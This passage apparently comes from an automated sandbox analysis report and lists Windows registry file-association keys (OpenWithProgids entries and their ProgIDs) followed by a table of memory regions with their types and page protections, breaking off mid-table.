HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithProgids
|
WMP11.AssocFile.AU
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au3\OpenWithProgids
|
AutoIt3Script
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\OpenWithProgids
|
WMP11.AssocFile.AVI
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\OpenWithProgids
|
Paint.Picture
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\OpenWithProgids
|
CABFolder
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cdxml\OpenWithProgids
|
Microsoft.PowerShellCmdletDefinitionXML.1
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.css\OpenWithProgids
|
CSSfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.csv\OpenWithProgids
|
Excel.CSV
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dds\OpenWithProgids
|
ddsfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dib\OpenWithProgids
|
Paint.Picture
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
|
dllfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
|
Word.Document.8
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docm\OpenWithProgids
|
Word.DocumentMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
|
Word.Document.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dot\OpenWithProgids
|
Word.Template.8
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotm\OpenWithProgids
|
Word.TemplateMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotx\OpenWithProgids
|
Word.Template.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.emf\OpenWithProgids
|
emffile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
|
exefile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\OpenWithProgids
|
WMP11.AssocFile.FLAC
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fon\OpenWithProgids
|
fonfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif\OpenWithProgids
|
giffile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithProgids
|
htmlfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
|
htmlfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ico\OpenWithProgids
|
icofile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.inf\OpenWithProgids
|
inffile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ini\OpenWithProgids
|
inifile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jfif\OpenWithProgids
|
pjpegfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpe\OpenWithProgids
|
jpegfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithProgids
|
jpegfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jxr\OpenWithProgids
|
wdpfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
|
lnkfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2t\OpenWithProgids
|
WMP11.AssocFile.M2TS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2ts\OpenWithProgids
|
WMP11.AssocFile.M2TS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2v\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\OpenWithProgids
|
WMP11.AssocFile.m3u
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\OpenWithProgids
|
WMP11.AssocFile.M4A
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithProgids
|
WMP11.AssocFile.MP4
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids
|
mhtmlfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithProgids
|
mhtmlfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithProgids
|
WMP11.AssocFile.MIDI
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\OpenWithProgids
|
WMP11.AssocFile.MIDI
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mk3d\OpenWithProgids
|
WMP11.AssocFile.MK3D
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mka\OpenWithProgids
|
WMP11.AssocFile.MKA
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mkv\OpenWithProgids
|
WMP11.AssocFile.MKV
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mod\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\OpenWithProgids
|
WMP11.AssocFile.MOV
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MP2\OpenWithProgids
|
WMP11.AssocFile.MP3
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2v\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\OpenWithProgids
|
WMP11.AssocFile.MP4
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpa\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpv2\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msg\OpenWithProgids
|
Outlook.File.msg.15
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids
|
WMP11.AssocFile.M2TS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ocx\OpenWithProgids
|
ocxfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odp\OpenWithProgids
|
PowerPoint.OpenDocumentPresentation.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ods\OpenWithProgids
|
Excel.OpenDocumentSpreadsheet.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odt\OpenWithProgids
|
Word.OpenDocumentText.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.otf\OpenWithProgids
|
otffile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids
|
pngfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pot\OpenWithProgids
|
PowerPoint.Template.8
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potm\OpenWithProgids
|
PowerPoint.TemplateMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potx\OpenWithProgids
|
PowerPoint.Template.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppam\OpenWithProgids
|
PowerPoint.Addin.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsm\OpenWithProgids
|
PowerPoint.SlideShowMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsx\OpenWithProgids
|
PowerPoint.SlideShow.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppt\OpenWithProgids
|
PowerPoint.Show.8
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptm\OpenWithProgids
|
PowerPoint.ShowMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptx\OpenWithProgids
|
PowerPoint.Show.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1\OpenWithProgids
|
Microsoft.PowerShellScript.1
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1xml\OpenWithProgids
|
Microsoft.PowerShellXMLData.1
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psd1\OpenWithProgids
|
Microsoft.PowerShellData.1
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psm1\OpenWithProgids
|
Microsoft.PowerShellModule.1
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pssc\OpenWithProgids
|
Microsoft.PowerShellSessionConfiguration.1
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rle\OpenWithProgids
|
rlefile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithProgids
|
WMP11.AssocFile.MIDI
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rtf\OpenWithProgids
|
Word.RTF.8
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scf\OpenWithProgids
|
SHCmdFile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.search-ms\OpenWithProgids
|
SearchFolder
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\OpenWithProgids
|
shtmlfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldm\OpenWithProgids
|
PowerPoint.SlideMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldx\OpenWithProgids
|
PowerPoint.Slide.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithProgids
|
WMP11.AssocFile.AU
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sys\OpenWithProgids
|
sysfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tif\OpenWithProgids
|
TIFImage.Document
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff\OpenWithProgids
|
TIFImage.Document
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\OpenWithProgids
|
WMP11.AssocFile.TTS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttc\OpenWithProgids
|
ttcfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttf\OpenWithProgids
|
ttffile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TTS\OpenWithProgids
|
WMP11.AssocFile.TTS
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids
|
txtfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vsto\OpenWithProgids
|
bootstrap.vsto.1
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\OpenWithProgids
|
WMP11.AssocFile.WAV
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\OpenWithProgids
|
WMP11.AssocFile.WAX
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wdp\OpenWithProgids
|
wdpfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\OpenWithProgids
|
WMP11.AssocFile.ASF
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenWithProgids
|
WMP11.AssocFile.WMA
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmf\OpenWithProgids
|
wmffile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithProgids
|
WMP11.AssocFile.WMV
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\OpenWithProgids
|
WMP11.AssocFile.ASX
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WPL\OpenWithProgids
|
WMP11.AssocFile.WPL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithProgids
|
WMP11.AssocFile.WVX
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlam\OpenWithProgids
|
Excel.AddInMacroEnabled
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xls\OpenWithProgids
|
Excel.Sheet.8
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsb\OpenWithProgids
|
Excel.SheetBinaryMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsm\OpenWithProgids
|
Excel.SheetMacroEnabled.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
|
Excel.Sheet.12
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlt\OpenWithProgids
|
Excel.Template.8
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltm\OpenWithProgids
|
Excel.TemplateMacroEnabled
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltx\OpenWithProgids
|
Excel.Template
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xml\OpenWithProgids
|
xmlfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xsl\OpenWithProgids
|
xslfile
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
|
CheckSetting
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
|
PastIconsStream
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify
|
IconStreams
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
|
TaskbarStateLastRun
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021492-0000-0000-C000-000000000046}\Enum
|
Implementing
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102
|
CheckSetting
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
|
LastUpdate
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
|
LastUpdate
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 251 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
ADAB000
|
heap
|
page read and write
|
||
4902000
|
heap
|
page read and write
|
||
284B06A3000
|
trusted library allocation
|
page read and write
|
||
BA67000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
B8DE000
|
heap
|
page read and write
|
||
B66B000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
B6C3000
|
heap
|
page read and write
|
||
BB2E000
|
heap
|
page read and write
|
||
BA66000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
4909000
|
heap
|
page read and write
|
||
BB66000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
896D000
|
heap
|
page read and write
|
||
284B0370000
|
trusted library allocation
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
A787F7E000
|
unkown
|
page readonly
|
||
BB2D000
|
heap
|
page read and write
|
||
8EA6000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
8983000
|
heap
|
page read and write
|
||
C25A000
|
stack
|
page read and write
|
||
48E3000
|
heap
|
page read and write
|
||
8983000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A65F000
|
heap
|
page read and write
|
||
8902000
|
heap
|
page read and write
|
||
BBEC000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
ADBB000
|
heap
|
page read and write
|
||
A5D1000
|
heap
|
page read and write
|
||
BB0B000
|
heap
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
E0BB000
|
heap
|
page read and write
|
||
BAD5000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
BB88000
|
heap
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
AD93000
|
heap
|
page read and write
|
||
898F000
|
heap
|
page read and write
|
||
A687000
|
heap
|
page read and write
|
||
8978000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
4B50000
|
heap
|
page read and write
|
||
BB2E000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
284B0700000
|
remote allocation
|
page read and write
|
||
898F000
|
heap
|
page read and write
|
||
B6BD000
|
heap
|
page read and write
|
||
8978000
|
heap
|
page read and write
|
||
284B09C0000
|
trusted library allocation
|
page read and write
|
||
8913000
|
heap
|
page read and write
|
||
BADC000
|
heap
|
page read and write
|
||
BA64000
|
heap
|
page read and write
|
||
B695000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
31F2000
|
stack
|
page read and write
|
||
ADC8000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
B689000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
284B0615000
|
trusted library allocation
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
BB66000
|
heap
|
page read and write
|
||
BA2F000
|
heap
|
page read and write
|
||
7DF4F0F20000
|
trusted library allocation
|
page readonly
|
||
DD4F000
|
stack
|
page read and write
|
||
BA70000
|
heap
|
page read and write
|
||
BA30000
|
heap
|
page read and write
|
||
BAEA000
|
heap
|
page read and write
|
||
8973000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
A63A000
|
heap
|
page read and write
|
||
8983000
|
heap
|
page read and write
|
||
8727000
|
heap
|
page read and write
|
||
48F2000
|
heap
|
page read and write
|
||
BB88000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
BBC0000
|
heap
|
page read and write
|
||
85A0000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
BB95000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
BB88000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
47BF000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
896F000
|
heap
|
page read and write
|
||
BB51000
|
heap
|
page read and write
|
||
B744000
|
heap
|
page read and write
|
||
BB51000
|
heap
|
page read and write
|
||
DE80000
|
heap
|
page read and write
|
||
4902000
|
heap
|
page read and write
|
||
284B0360000
|
trusted library allocation
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
4C53000
|
heap
|
page read and write
|
||
BB0D000
|
heap
|
page read and write
|
||
86A6000
|
heap
|
page read and write
|
||
BB0D000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
D19000
|
stack
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
A65F000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
BB51000
|
heap
|
page read and write
|
||
B8D5000
|
heap
|
page read and write
|
||
8942000
|
heap
|
page read and write
|
||
ADE2000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
C020000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
heap
|
page read and write
|
||
4902000
|
heap
|
page read and write
|
||
BA64000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
8965000
|
heap
|
page read and write
|
||
B660000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
A623000
|
heap
|
page read and write
|
||
284AADB0000
|
heap
|
page read and write
|
||
BB0F000
|
heap
|
page read and write
|
||
896F000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
BB75000
|
heap
|
page read and write
|
||
85C8000
|
heap
|
page read and write
|
||
C063000
|
trusted library allocation
|
page read and write
|
||
7DF4F0F51000
|
trusted library allocation
|
page execute read
|
||
4953000
|
heap
|
page read and write
|
||
A650000
|
heap
|
page read and write
|
||
85CB000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
AD9E000
|
heap
|
page read and write
|
||
284AAE8E000
|
heap
|
page read and write
|
||
ADB0000
|
heap
|
page read and write
|
||
B3CE000
|
stack
|
page read and write
|
||
8978000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
88FE000
|
heap
|
page read and write
|
||
BB0F000
|
heap
|
page read and write
|
||
284B066C000
|
trusted library allocation
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
B971000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
284B04EA000
|
heap
|
page read and write
|
||
B9DE000
|
heap
|
page read and write
|
||
4960000
|
heap
|
page read and write
|
||
284B03A4000
|
trusted library allocation
|
page read and write
|
||
85E2000
|
heap
|
page read and write
|
||
B923000
|
heap
|
page read and write
|
||
BB75000
|
heap
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
47D2000
|
heap
|
page read and write
|
||
493E000
|
heap
|
page read and write
|
||
B87F000
|
heap
|
page read and write
|
||
BB66000
|
heap
|
page read and write
|
||
B9DA000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
DF0F000
|
stack
|
page read and write
|
||
88F7000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
898F000
|
heap
|
page read and write
|
||
BA55000
|
heap
|
page read and write
|
||
85E0000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
DEE000
|
stack
|
page read and write
|
||
BBB6000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
7DF4F0F41000
|
trusted library allocation
|
page execute read
|
||
E1C0000
|
trusted library allocation
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
4C55000
|
heap
|
page read and write
|
||
BA70000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
A788B7E000
|
unkown
|
page readonly
|
||
BB0B000
|
heap
|
page read and write
|
||
4C4F000
|
heap
|
page read and write
|
||
48E6000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
BA1F000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
BB45000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
86A8000
|
heap
|
page read and write
|
||
4BA6000
|
heap
|
page read and write
|
||
DCCA000
|
stack
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
86A8000
|
heap
|
page read and write
|
||
9168000
|
stack
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
BBC0000
|
heap
|
page read and write
|
||
BB0D000
|
heap
|
page read and write
|
||
BB5B000
|
heap
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
8891000
|
heap
|
page read and write
|
||
284B0390000
|
trusted library allocation
|
